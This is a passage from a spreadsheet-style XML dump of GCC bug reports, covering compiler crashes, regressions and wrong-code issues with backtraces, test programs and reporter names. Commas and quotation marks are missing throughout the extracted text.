    at /home/eric/svn/gcc/gcc/diagnostic.c:837
#1  0x0909efc2 in fancy_abort (file=0x91b9220 /home/eric/svn/gcc/gcc/tree.c
    line=6441 function=0x91bb8ce tree_low_cst)
    at /home/eric/svn/gcc/gcc/diagnostic.c:893
#2  0x08aa8c07 in tree_low_cst (t=0xf7d9cf50 pos=0)
    at /home/eric/svn/gcc/gcc/tree.c:6441
#3  0x08a86f60 in int_bit_position (field=0xf7cd4c38)
    at /home/eric/svn/gcc/gcc/tree.c:2364
#4  0x0896be08 in build_ref_for_model (loc=41221 base=0xf7d92ea0 offset=32
    model=0x9a99d50 gsi=0xffffcd34 insert_after=0 '\000')
    at /home/eric/svn/gcc/gcc/tree-sra.c:1425
#5  0x0896f6a1 in generate_subtree_copies (access=0x9a99d50 agg=0xf7d92ea0
    top_offset=0 start_offset=0 chunk_size=0 gsi=0xffffcd34
    write=0 '\000' insert_after=0 '\000' loc=41221)
    at /home/eric/svn/gcc/gcc/tree-sra.c:2297
#6  0x0897155b in sra_modify_assign (stmt=0xffffcd30 gsi=0xffffcd34)
    at /home/eric/svn/gcc/gcc/tree-sra.c:2823
#7  0x08971c07 in sra_modify_function_body ()
    at /home/eric/svn/gcc/gcc/tree-sra.c:2942
#8  0x08972185 in perform_intra_sra ()
#9  0x08972280 in early_intra_sra () at /home/eric/svn/gcc/gcc/tree-sra.c:3079
Testcase suitable for the gnat.dg testsuite to be attached run 'gnatchop' on it and compile at -O the .adb file.</t>
  </si>
  <si>
    <t>jamborm</t>
  </si>
  <si>
    <t>GCC-23097</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] non-printable output from write with certain formats</t>
  </si>
  <si>
    <t>[casper@ARROW test_blas]$ ~/GREG/bin_gcc/bin/gfortran -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc4/configure --prefix=/home/casper/GREG/bin_gcc --
mandir=/home/casper/GREG/objdir/share/man --enable-
languages=cc++f95javaobjc --enable-shared --enable-threads=posix --with-
mpfr=/home/casper/GREG/f90_prereq --with-gmp=/home/casper/GREG/f90_prereq : 
(reconfigured) ../gcc4/configure --prefix=/home/casper/GREG/bin_gcc --enable-
threads --with-gmp=/home/casper/GREG/f90_prereq --with-
mpfr=/home/casper/GREG/f90_prereq
Thread model: posix
gcc version 4.1.0 20050719 (experimental)
[casper@ARROW test_blas]$ uname -a
Linux ARROW 2.4.20-8bigmem #1 SMP Thu Mar 13 17:32:29 EST 2003 i686 i686 i386 
GNU/Linux
[casper@ARROW test_blas]$ cat test_io.f90
PROGRAM TEST_IO
  INTEGER :: A = 12 B = 109
  ! actual data not important
  WRITE(*100)AB
  WRITE(*101)AB
  100 FORMAT(/2XI5/2XI5)
  101 FORMAT(2(/3XI5))
END PROGRAM TEST_IO
[casper@ARROW test_blas]$ ~/GREG/bin_gcc/bin/gfortran test_io.f90 -static
[casper@ARROW test_blas]$ ./a.out
     12
  109
      12
  109
-----------------------------------------------------------------
As you can see this is the expected normal behavior but if you redirect the 
output by either piping to something like less or to a file then editing with 
say:
[casper@ARROW test_blas]$ ./a.out &gt; junk vi junk
the file becomes:
     12
^@^@  109
      12
^@^@^@  109
------------------------------------------------------------------
the ^@ characters are supposed to be the blanks that the #X outputs.  As you 
can see it prints some odd character instead.  This only happens after you 
make a newline with / otherwise it works as normal.  If you have a single 
format statement with multiple /2X statements like format 101 above the first 
one works correctly all others after this exibit the bug.</t>
  </si>
  <si>
    <t>grrogers</t>
  </si>
  <si>
    <t>GCC-19016</t>
  </si>
  <si>
    <t>[4.0 only] maxloc ignores mask</t>
  </si>
  <si>
    <t>$ cat maxloc-3.f90
  integer dimension(33) :: n
  integer dimension(2) :: i
  n = reshape((/3 2 1 4 7 8 7 8 9/) shape(n))
  i = maxloc(n mask = n&lt;6 )
  print '(3I3)'n
  print '(3L3)'n&lt;6
  print *i
  if (.not. n(i(1)i(2))&lt;6) call abort
end program
$ gfortran maxloc-3.f90
$ ./a.out
  3  2  1
  4  7  8
  7  8  9
  T  T  T
  T  F  F
  F  F  F
           3           2
Aborted
$ gfortran -v
Reading specs from /home/zfkts/lib/gcc/ia64-unknown-linux-gnu/4.0.0/specs
Configured with: ../gcc-4.0-20041212/configure --prefix=/home/zfkts
--enable-languages=cc++f95 : (reconfigured) ../gcc-4.0-20041212/configure
--prefix=/home/zfkts --enable-languages=cc++f95 --disable-shared
Thread model: posix
gcc version 4.0.0 20041212 (experimental)</t>
  </si>
  <si>
    <t>Thomas.Koenig</t>
  </si>
  <si>
    <t>GCC-44227</t>
  </si>
  <si>
    <t>Invalid instruction generation in Thumb2 for tst instruction.</t>
  </si>
  <si>
    <t>CSiBe builds broke because of this change here to fix PR42879.
http://gcc.gnu.org/ml/gcc-cvs/2010-05/msg00263.html
Attached is a reduced testcase that shows the problem. The problem appears to be due to incorrect generation of the tst instruction as a result of the pattern added where the tst instruction appears to be generating a tst with 32767 which is an invalid immediate for the tst instruction in Thumb2 state.
Carrot can you look at this further ? 
Ramana</t>
  </si>
  <si>
    <t>ramana</t>
  </si>
  <si>
    <t>GCC-6827</t>
  </si>
  <si>
    <t>Unreasonable dependencies on ctype.h</t>
  </si>
  <si>
    <t>libstdc++ assumes the following symbols are available from ctype.h:
_N 
_L
_X
_U
_P
_S
_B
_C
_ctype_
I assume that these are not part of the ISO standard C ctype.h definition.
This bug stops libstdc++ from being compilable with headers other than glibc's
Release:
unknown
Environment:
builing sh-elf cross compiler</t>
  </si>
  <si>
    <t>brd</t>
  </si>
  <si>
    <t>GCC-3025</t>
  </si>
  <si>
    <t>duplicate class def</t>
  </si>
  <si>
    <t>kjetism@olivier ~/radium $ make
g++ -v -save-temps -c -g -Wall -Werror -DVERSION=0.43 -I/hom/kjetism/gc/include -IQt/ -I/local/qt/include Qt/Qt_visual.c
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/2.96/specs
gcc version 2.96 20000731 (Red Hat Linux 7.0)
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cpp0 -lang-c++ -D__GNUG__=2 -v -I/hom/kjetism/gc/include -IQt/ -I/local/qt/include -D__GNUC__=2 -D__GNUC_MINOR__=96 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem(posix) -g -Wall -Werror -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -D__tune_i386__ -DVERSION=0.43 Qt/Qt_visual.c Qt_visual.ii
GNU CPP version 2.96 20000731 (Red Hat Linux 7.0) (cpplib)
 (i386 Linux/ELF)
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /hom/kjetism/gc/include
 Qt/
 /local/qt/include
 /usr/include/g++-3
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i386-redhat-linux/2.96/cc1plus Qt_visual.ii -quiet -dumpbase Qt_visual.c -g -Wall -Werror -version -o Qt_visual.s
GNU C++ version 2.96 20000731 (Red Hat Linux 7.0) (i386-redhat-linux) compiled by GNU C version 2.96 20000731 (Red Hat Linux 7.0).
Qt/Qt_visual.c:6: redefinition of `class MyWidget'
Qt/MyWidget.h:13: previous definition here
Qt/Qt_visual.c:28: Internal error #20000116.
Qt/Qt_visual.c:28: Internal compiler error in finish_struct_1 at 
../gcc/cp/class.c:5102
Please submit a full bug report.
See  for instructions.
make: *** [Qt_visual.o] Error 1
kjetism@olivier ~/radium $ ''
Release:
unknown</t>
  </si>
  <si>
    <t>k.s.matheussen</t>
  </si>
  <si>
    <t>GCC-12125</t>
  </si>
  <si>
    <t>[tree-ssa] Segmentation fault on bootstrap mips-sgi-IRIX6.5</t>
  </si>
  <si>
    <t>octane # gcc -v
Reading specs from /usr/freeware/lib/gcc-lib/mips-sgi-irix6.5/3.3/specs
Configured with: ../configure --prefix=/usr/freeware
--enable-version-specific-runtime-libs --disable-shared --enable-threads
--enable-haifa --enable-libgcj --disable-c-mbchar
Thread model: single
gcc version 3.3
--------------------------
configure --prefix=/usr/gFORTRAN --with-gmp=/usr/GMP --enable-languages=cf95
gmake CC=gcc -save-temps bootstrap
--------------------------
gmake[3]: Entering directory `/usr/people/wstan/objdir/gcc'
for d in libgcc mabi=64 libgcc/mabi=64 do \
  if [ -d $d ] then true else /bin/sh ../../gcc/gcc/mkinstalldirs $d fi \
done
mkdir -p -- libgcc
mkdir -p -- mabi=64
mkdir -p -- libgcc/mabi=64
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
/usr/people/wstan/objdir/gcc/xgcc -B/usr/people/wstan/objdir/gcc/
-B/usr/gFORTRAN/mips-sgi-irix6.5/bin/ -B/usr/gFORTRAN/mips-sgi-irix6.5/lib/
-isystem /usr/gFORTRAN/mips-sgi-irix6.5/include -isystem
/usr/gFORTRAN/mips-sgi-irix6.5/sys-include -O2  -DIN_GCC    -W -Wall
-Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g
 -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I../../gcc/gcc
-I../../gcc/gcc/. -I../../gcc/gcc/config -I../../gcc/gcc/../include -I../intl
-I../../gcc/gcc/../libbanshee/libcompat -I../../gcc/gcc/../libbanshee
-I../../gcc/gcc/../libbanshee/points-to -I/usr/GMP/include  -DL_muldi3 -c
../../gcc/gcc/libgcc2.c -o libgcc/./_muldi3.o
../../gcc/gcc/libgcc2.c: In function `__muldi3':
../../gcc/gcc/libgcc2.c:506: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[3]: *** [libgcc/./_muldi3.o] Error 1
gmake[3]: Leaving directory `/usr/people/wstan/objdir/gcc'
gmake[2]: *** [stmp-multilib] Error 2
gmake[2]: Leaving directory `/usr/people/wstan/objdir/gcc'
gmake[1]: *** [stage1_build] Error 2
gmake[1]: Leaving directory `/usr/people/wstan/objdir/gcc'
gmake: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>wstan</t>
  </si>
  <si>
    <t>GCC-4690</t>
  </si>
  <si>
    <t>Process.exitValue returns incorrect value</t>
  </si>
  <si>
    <t>java::lang::ConcreteProcess::exitValue in
natPosixProcess.cc returns the raw status
value from waitpid().  This value needs
to be run through the WEXITSTATUS() macro
to extract only the exit code of the process.
Release:
gcc-3.01</t>
  </si>
  <si>
    <t>shayne</t>
  </si>
  <si>
    <t>GCC-19515</t>
  </si>
  <si>
    <t>[4.0 Regression] Violation of C99 6.7.8 Â§21 for unions</t>
  </si>
  <si>
    <t>typedef unsigned char uint8_t
typedef unsigned short uint16_t
typedef unsigned int uint32_t
typedef unsigned long long upad64_t
typedef struct _pthread_mutex {
        struct {
                uint16_t        __pthread_mutex_flag1
                uint8_t         __pthread_mutex_flag2
                uint8_t         __pthread_mutex_ceiling
                uint16_t        __pthread_mutex_type
                uint16_t        __pthread_mutex_magic
        } __pthread_mutex_flags
        union {
                struct {
                        uint8_t __pthread_mutex_pad[8]
                } __pthread_mutex_lock64
                struct {
                        uint32_t __pthread_ownerpid
                        uint32_t __pthread_lockword
                } __pthread_mutex_lock32
                upad64_t __pthread_mutex_owner64
        } __pthread_mutex_lock
        upad64_t __pthread_mutex_data
} pthread_mutex_t 
void foo(void)
{
   pthread_mutex_t tmp =  {{0 0 0 0 0x4d58} {{{0}}} 0}
}
On SPARC64 at -O0:
        sth     %g0 [%fp+2007]
        stb     %g0 [%fp+2009]
        stb     %g0 [%fp+2010]
        sth     %g0 [%fp+2011]
        sethi   %hi(19456) %g1
        or      %g1 344 %g1
        sth     %g1 [%fp+2013]
        stb     %g0 [%fp+2015]
        stx     %g0 [%fp+2023]
On AMD64 at -O0:
        movw    $0 -32(%rbp)
        movb    $0 -30(%rbp)
        movb    $0 -29(%rbp)
        movw    $0 -28(%rbp)
        movw    $19800 -26(%rbp)
        movb    $0 -24(%rbp)
        movq    $0 -16(%rbp)
Note the 'b' on the last but one line in both cases: __pthread_mutex_pad is not
initialized according to the ISO C99 rules.  This is critical on Solaris 64-bit
as it affects POSIX thread support.
The C++ and Objective-C compilers are also affected.</t>
  </si>
  <si>
    <t>GCC-38398</t>
  </si>
  <si>
    <t>g0.w edit descriptor: Update for F2008 Tokyo meeting changes</t>
  </si>
  <si>
    <t>The current g0.w edit descriptor implementation is based on the F2008 comment resolution at J3 resolution. Afterwards there was the Tokyo WG5 which also addressed ISO member comments. Unfortunately the g0. was changed a bit.
At the WG5 meeting in Tokyo one agreed on the following modified version see
ftp://ftp.nag.co.uk/sc22wg5/N1751-N1800/N1760.txt:
2.6 Generalized output editing
 A similar feature has been added see 08-296r2.
That is the following paper:
  http://www.j3-fortran.org/doc/year/08/08-296r2.txt
I think the current implementation (see PR 37228) is based on
     http://j3-fortran.org/doc/year/08/08-251r3.txt
and  http://www.j3-fortran.org/doc/year/08/08-272.html
In the original J3 response 08-251r3 G0.d like G0 was defined in
 terms of the ESw.d format meaning that even values close to zero
 would be shown in E format unlike the Gw.d format (for w&gt;0) which
 would choose F format for such values.  N1743 suggested that G0 and
 G0.d behave more like Gw.d in such cases and J3 agrees.
Currently gfortran prints:
3.4500E+00   ES10.4
    3.4500   F10.4
 3.450       g10.4
     3.4500E+00   g0.4
Note that contrary to the other edit descriptors:
 that any leading or trailing blanks are removed.
If I read the new proposal correctly the out should not be:
3.450 without heading spaces.
 * * *
Per C1007+ the e may not be specified for g0 e.g.
 g0.4e4
gfortran rejects this but with a rather strange error message:
print '(g0.4e4)'   3.45
                       1
Error: Period required in format specifier at (1)</t>
  </si>
  <si>
    <t>GCC-80079</t>
  </si>
  <si>
    <t>[7 Regression] Conditional jump or move depends on uninitialised value(s): gimple-ssa-store-merging.c:768</t>
  </si>
  <si>
    <t>r246213 causes the following valgrind issues:
==13451== Conditional jump or move depends on uninitialised value(s)
==13451==    at 0x10DB984C: (anonymous namespace)::pass_store_merging::terminate_and_process_all_chains() (gimple-ssa-store-merging.c:768)
==13451==    by 0x10DB9CCB: (anonymous namespace)::pass_store_merging::execute(function*) (gimple-ssa-store-merging.c:1516)
==13451==    by 0x10605843: execute_one_pass(opt_pass*) (passes.c:2465)
==13451==    by 0x10606167: execute_pass_list_1(opt_pass*) (passes.c:2554)
==13451==    by 0x1060617F: execute_pass_list_1(opt_pass*) (passes.c:2555)
==13451==    by 0x1060622B: execute_pass_list(function* opt_pass*) (passes.c:2565)
==13451==    by 0x102BF217: cgraph_node::expand() (cgraphunit.c:2038)
==13451==    by 0x102C0F37: expand_all_functions (cgraphunit.c:2174)
==13451==    by 0x102C0F37: symbol_table::compile() (cgraphunit.c:2531)
==13451==    by 0x102C2EE3: symbol_table::finalize_compilation_unit() (cgraphunit.c:2621)
==13451==    by 0x106FB527: compile_file() (toplev.c:492)
==13451==    by 0x1013B55B: do_compile (toplev.c:2000)
==13451==    by 0x1013B55B: toplev::main(int char**) (toplev.c:2134)
==13451==    by 0x1013D657: main (main.c:39)
==13451== 
==13451== Conditional jump or move depends on uninitialised value(s)
==13451==    at 0x10DB973C: (anonymous namespace)::pass_store_merging::terminate_all_aliasing_chains((anonymous namespace)::imm_store_chain_info** bool gimple*) (gimple-ssa-store-merging.c:837)
==13451==    by 0x10DB9CB7: (anonymous namespace)::pass_store_merging::execute(function*) (gimple-ssa-store-merging.c:1514)
==13451==    by 0x10605843: execute_one_pass(opt_pass*) (passes.c:2465)
==13451==    by 0x10606167: execute_pass_list_1(opt_pass*) (passes.c:2554)
==13451==    by 0x1060617F: execute_pass_list_1(opt_pass*) (passes.c:2555)
==13451==    by 0x1060622B: execute_pass_list(function* opt_pass*) (passes.c:2565)
==13451==    by 0x102BF217: cgraph_node::expand() (cgraphunit.c:2038)
==13451==    by 0x102C0F37: expand_all_functions (cgraphunit.c:2174)
==13451==    by 0x102C0F37: symbol_table::compile() (cgraphunit.c:2531)
==13451==    by 0x102C2EE3: symbol_table::finalize_compilation_unit() (cgraphunit.c:2621)
==13451==    by 0x106FB527: compile_file() (toplev.c:492)
==13451==    by 0x1013B55B: do_compile (toplev.c:2000)
==13451==    by 0x1013B55B: toplev::main(int char**) (toplev.c:2134)
==13451==    by 0x1013D657: main (main.c:39)
==13451==</t>
  </si>
  <si>
    <t>GCC-21237</t>
  </si>
  <si>
    <t>[4.0 Regression] unnecessary __cmpdi2 usage?</t>
  </si>
  <si>
    <t>in function cryptcompress_truncate() from reiserfs4 patch  
compiler uses __cmpdi2 for old_size vs new_size (64 bit) comparision:  
 result = (old_size &lt; new_size ? cryptcompress_append_hole(inode new_size) :  
    prune_cryptcompress(inode new_size update_sd aidx))  
in another case for simple foo() method gcc inlines __cmpdi2 equivalent:  
int foo(long long x long long y) { return (x &lt; y) }  
foo:    cmpw 753  
        li 00  
        bgt- 7.L3  
        cmplw 664  
        beq- 7.L6  
.L2:    mr 30  
        blr  
.L6:    ble- 6.L2  
.L3:    li 01  
        mr 30  
        blr  
what decides which variant is chosen? 
is it possible to force inlining? 
# gcc-4.0.0+pr20973+pr21173</t>
  </si>
  <si>
    <t>GCC-37337</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE: verify_flow_info failed</t>
  </si>
  <si>
    <t>I just tried to compile the Suse Linux package bochs-2.2.1-202
with the GNU C++ compiler version 4.4 snapshot 20080829.
The compiler said
In constructor 'bx_null_pktmover_c::bx_null_pktmover_c(const char* const char* void (*)(void* const void* unsigned int) void* char*)':
eth_null.cc:88: error: BB 18 can not throw but has EH edges
eth_null.cc:88: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Pre-processed source code attached. Flags -O2 -fpermissive required.</t>
  </si>
  <si>
    <t>GCC-31378</t>
  </si>
  <si>
    <t>too few template-parameter-lists when initializing static template member</t>
  </si>
  <si>
    <t>When compiling the following program the g++ 4.1.0 gives the error message:
testtemplstatic.cpp:22: error: too few template-parameter-lists. Which I interprete as a complaint that a template is missing.
If I uncomment the template in line 21 g++ prints the error message:
testtemplstatic.cpp:22: error: template header not allowed in member definition of explicitly specialized class which I interprete as having a template too much.
One of the both versions (presumably the first) should be correct.
My configuration:
&gt; g++ -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.1.0/configure --prefix=/flc/flc03/data/samson/soft/gcc/4.1.0 --enable-languages=cc++
Thread model: posix
gcc version 4.1.0
Regretfully I cannot check the bug with an 4.1.2 version of g++ as the compilation of gcc 4.1.2 fails with an linker error on a Scientific Linux (RHEL3) machine.
Cheers T.
#include 
using namespace std
template
struct foo
{
  struct bar
}
template
struct foo::bar
{
  const static char* blubb
}
template struct foo
//template
const char* foo::bar::blubb = huhu
int main()
{
  cout ::bar::blubb &lt;&lt;endl
}</t>
  </si>
  <si>
    <t>trumsko</t>
  </si>
  <si>
    <t>GCC-51101</t>
  </si>
  <si>
    <t>i386-rtems fails to compile dwarf2asm.c</t>
  </si>
  <si>
    <t>First noticed: Fri Nov 11 13:16:33 UTC 2011 (revision 181284)
Still present: Fri Nov 11 22:49:37 UTC 2011 (revision 181301)
gcc -c   -g -O2 -DIN_GCC -DCROSS_DIRECTORY_STRUCTURE  -W -Wall -Wno-narrowing -Wwrite-strings -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wc++-compat -fno-common  -DHAVE_CONFIG_H -I. -I. -I/users/joel/test-gcc/gcc-svn/gcc -I/users/joel/test-gcc/gcc-svn/gcc/. -I/users/joel/test-gcc/gcc-svn/gcc/../include -I/users/joel/test-gcc/gcc-svn/gcc/../libcpp/include  -I/users/joel/test-gcc/gcc-svn/gcc/../libdecnumber -I/users/joel/test-gcc/gcc-svn/gcc/../libdecnumber/dpd -I../libdecnumber -I/users/joel/test-gcc/install-svn/include    /users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c -o dwarf2asm.o
/users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c: In function â€˜dw2_asm_output_nstringâ€™:
/users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c:334:7: error: â€˜STRING_LIMITâ€™ undeclared (first use in this function)
/users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c:334:7: note: each undeclared identifier is reported only once for each function it appears in
/users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c:334:7: warning: pointer targets in passing argument 2 of â€˜default_elf_asm_output_limited_stringâ€™ differ in signedness [-Wpointer-sign]
In file included from /users/joel/test-gcc/gcc-svn/gcc/dwarf2asm.c:29:0:
/users/joel/test-gcc/gcc-svn/gcc/output.h:667:13: note: expected â€˜const char *â€™ but argument is of type â€˜const unsigned char *â€™
make[2]: *** [dwarf2asm.o] Error 1</t>
  </si>
  <si>
    <t>GCC-56135</t>
  </si>
  <si>
    <t>[c++11] this incorrectly captured as null in template member function</t>
  </si>
  <si>
    <t>Created attachment 29298
Test case showing broken capture of this
When creating a lambda function in a template member function when capturing this using [=] this is not captured correctly when the lambda only calls another template member function reusing the outer template argument.
Qualifying the call with this or not passing on the outer template argument solves the issue.
In the attached code I expect this to be captured in all 4 cases but the broken captures null resulting in the print out:
./test
(nil)
0x7fff1354f2af
0x7fff1354f2af
0x7fff1354f2af
GDB shows the same - this has been captured but with null as value.
clang 3.2 captures this as expected.</t>
  </si>
  <si>
    <t>arnetheduck</t>
  </si>
  <si>
    <t>GCC-7738</t>
  </si>
  <si>
    <t>cannot build jython from source</t>
  </si>
  <si>
    <t>Building jython from the rhug distribution fails because assert is now a keyword and jython sources use assert for identifiers.
Note this is a regression from previous releases.
Release:
3.3 20020826 (experimental)
How-To-Repeat:
With a recent gcj checkout/build rhug.</t>
  </si>
  <si>
    <t>GCC-36785</t>
  </si>
  <si>
    <t>Segmentation fault in Gnat.Regexp</t>
  </si>
  <si>
    <t>$ gnatmake rtest.adb
gcc -c rtest.adb
gnatbind -x rtest.ali
gnatlink rtest.ali
$ ./rtest
raised STORAGE_ERROR : stack overflow (or erroneous memory access)
Also occurs with GNAT GPL 2008.
-- chop here --
with Gnat.Regexp
procedure RTest is
   R : constant Gnat.Regexp.Regexp := Gnat.Regexp.Compile
     (Pattern =&gt; .*AB.*|.*XYZ.*|.*0123456.*)
   B : Boolean
begin
   B := Gnat.Regexp.Match(A R)
end</t>
  </si>
  <si>
    <t>baldrick</t>
  </si>
  <si>
    <t>GCC-44620</t>
  </si>
  <si>
    <t>gcc -fvisibility-ms-compat crash when throwing const char*</t>
  </si>
  <si>
    <t>This simple source file causes gcc to crash when compiled with -fvisibility-ms-compat:
void foo()
{ 
  throw Help!
}
% gcc -v -save-temps -c -fvisibility-ms-compat crash.cxx 
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../../src/lnx32/configure --prefix=/tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4 --enable-languages=cc++
Thread model: posix
gcc version 4.4.4 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-fvisibility-ms-compat' '-mtune=generic'
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/libexec/gcc/i686-pc-linux-gnu/4.4.4/cc1plus -E -quiet -v -D_GNU_SOURCE crash.cxx -mtune=generic -fvisibility-ms-compat -fpch-preprocess -o crash.ii
ignoring nonexistent directory /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/../../../../include/c++/4.4.4
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/../../../../include/c++/4.4.4/i686-pc-linux-gnu
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/../../../../include/c++/4.4.4/backward
 /usr/local/include
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/include
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/include
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/lib/gcc/i686-pc-linux-gnu/4.4.4/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-fvisibility-ms-compat' '-mtune=generic'
 /tools/batonroot/rodin/devkits/lnx32/gcc-4.4.4/libexec/gcc/i686-pc-linux-gnu/4.4.4/cc1plus -fpreprocessed crash.ii -quiet -dumpbase crash.cxx -mtune=generic -auxbase crash -version -fvisibility-ms-compat -o crash.s
GNU C++ (GCC) version 4.4.4 (i686-pc-linux-gnu)
	compiled by GNU C version 4.4.4 GMP version 5.0.1 MPFR version 2.4.2.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: b301e3deb4f2be9f847ad7d75351dd84
crash.cxx:3: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I am not sure how to attach the .ii file but the content is pasted here:
# 1 crash.cxx
# 1 
# 1 
# 1 crash.cxx
void foo()
{
  throw Help!
}</t>
  </si>
  <si>
    <t>soren.soe</t>
  </si>
  <si>
    <t>GCC-50765</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: in expand_insn at optabs.c:7681 with -ftree-vectorize -fno-tree-dce</t>
  </si>
  <si>
    <t>Created attachment 25529
reduced testcase
Compiler output:
$ gcc -O3 -fno-tree-dce testcase.c
testcase.c: In function 'foo':
testcase.c:1:6: internal compiler error: in expand_insn at optabs.c:7681
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
or
$ gcc -O2 -ftree-vectorize -fno-tree-dce testcase.c
testcase.c: In function 'foo':
testcase.c:1:6: internal compiler error: in expand_insn at optabs.c:7681
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  fancy_abort (file=0x1264d78 /mnt/svn/gcc-trunk/gcc/optabs.c line=7681 function=0x1265b92 expand_insn)
    at /mnt/svn/gcc-trunk/gcc/diagnostic.c:892
#1  0x00000000008d9be6 in expand_insn (icode=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/optabs.c:7681
#2  expand_insn (icode=Unhandled dwarf expression opcode 0xf3
) at /mnt/svn/gcc-trunk/gcc/optabs.c:7677
#3  0x00000000008da7aa in expand_widen_pattern_expr (ops=0x7fffffffd6b0 op0=0x7ffff57264a0 op1=0x0 wide_op=0x0 target=0x7ffff5726580 
    unsignedp=0) at /mnt/svn/gcc-trunk/gcc/optabs.c:629
#4  0x000000000075d7f8 in expand_expr_real_2 (ops=0x7fffffffd6b0 target=0x7ffff5726580 tmode=V4SImode modifier=EXPAND_NORMAL)
    at /mnt/svn/gcc-trunk/gcc/expr.c:8683
#5  0x0000000000669ea0 in expand_gimple_stmt_1 (stmt=0x7ffff5703460) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2014
#6  expand_gimple_stmt (stmt=0x7ffff5703460) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:2074
#7  0x000000000066b5c1 in expand_gimple_basic_block (bb=0x7ffff5687208) at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:3814
#8  0x000000000066d54b in gimple_expand_cfg () at /mnt/svn/gcc-trunk/gcc/cfgexpand.c:4322
#9  0x00000000008e4d78 in execute_one_pass (pass=0x179aba0) at /mnt/svn/gcc-trunk/gcc/passes.c:2064
#10 0x00000000008e50e5 in execute_pass_list (pass=0x179aba0) at /mnt/svn/gcc-trunk/gcc/passes.c:2119
#11 0x0000000000a3c12e in tree_rest_of_compilation (fndecl=0x7ffff5688b00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:420
#12 0x00000000006938ba in cgraph_expand_function (node=0x7ffff55886c0) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1804
#13 0x000000000069580c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1871
#14 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2148
#15 0x0000000000695bfa in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1312
#16 0x0000000000578933 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:9940
#17 0x00000000009da244 in compile_file (argc=15 argv=0x7fffffffdac8) at /mnt/svn/gcc-trunk/gcc/toplev.c:581
#18 do_compile (argc=15 argv=0x7fffffffdac8) at /mnt/svn/gcc-trunk/gcc/toplev.c:1925
#19 toplev_main (argc=15 argv=0x7fffffffdac8) at /mnt/svn/gcc-trunk/gcc/toplev.c:2001
#20 0x00007ffff6178d2d in __libc_start_main () from /lib64/libc.so.6
#21 0x000000000055c399 in _start ()
Tested revisions:
r180072 - crash
r178498 - crash
4.6 r177922 - OK</t>
  </si>
  <si>
    <t>GCC-3204</t>
  </si>
  <si>
    <t>EH does not work on AIX</t>
  </si>
  <si>
    <t>Throwing an exception often fails with
_URC_FATAL_PHASE2_ERROR
which causes std::terminate to be executed instead of
the appropriate handler.
Release:
gcc version 3.0 20010612 (prerelease)
Environment:
powerpc-ibm-aix4.3.3.0
How-To-Repeat:
testsuite/g++.old-deja/g++.eh/flow1.C</t>
  </si>
  <si>
    <t>dje</t>
  </si>
  <si>
    <t>GCC-64979</t>
  </si>
  <si>
    <t>[4.8 Regression] stdarg optimization not able to find escape sites in phi nodes</t>
  </si>
  <si>
    <t>Created attachment 34699
Experimental fix
The following testcase aborts when compiled with at least -O1:
#include 
